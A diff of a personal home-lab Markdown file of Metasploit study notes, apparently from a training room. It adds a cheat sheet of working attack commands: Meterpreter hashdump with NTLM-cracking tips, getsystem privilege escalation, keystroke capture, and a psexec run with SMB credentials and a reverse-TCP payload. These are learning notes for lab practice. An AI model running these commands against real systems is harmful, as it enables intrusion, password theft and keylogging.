YuriyVaslyuk/home-lab/metasploit-notes.md

 run post/linux/gather/hashdump

-Pulls stored password hashes which can be cracked later to reveal actual passwords, but I just needed it to complete the room
+Pulls stored password hashes which can be cracked later to reveal actual passwords, but I just needed it to complete the room.

 ---

 ### Things That Went Wrong
 404 error when target tries to download the file:
 Web server was not running from the same folder as shell.elf.
-Fix: cd /root first, then start the web server from there first couple of times I just had typos, like the wrong port instead of 9000 I had 99000 and wrong ip for the server
+Fix: cd /root first, then start the web server from there.
+First couple of times I just had typos, like the wrong port instead of 9000 I had 99000 and wrong IP for the server.

+---

+## Meterpreter Post-Exploitation

+# Get system info
+sysinfo

+# Check current user
+getuid

+# Dump password hashes (NTLM format: user:RID:LM:NTLM)
+hashdump

+# The NTLM hash is the part after the 3rd colon
+# Format: username:RID:LM_hash:NTLM_hash
+# Copy the NTLM hash and paste into crackstation.net to crack it

+# Search for a file
+search -f secrets.txt -d c:\\

+# Read a file (use quotes for paths with spaces)
+# Without quotes Meterpreter splits the path at each space
+cat "c:\\Program Files (x86)\\folder\\file.txt"

+# Escalate privileges
+getsystem

+# Drop into system shell
+shell

+# Capture keystrokes
+keyscan_start
+keyscan_dump
+keyscan_stop

+---

+## Windows SMB Exploitation with Credentials

+use exploit/windows/smb/psexec
+set SMBUser ballen
+set SMBPass Password1
+set RHOSTS target_ip
+set payload windows/x64/meterpreter/reverse_tcp
+set LHOST my_ip
+run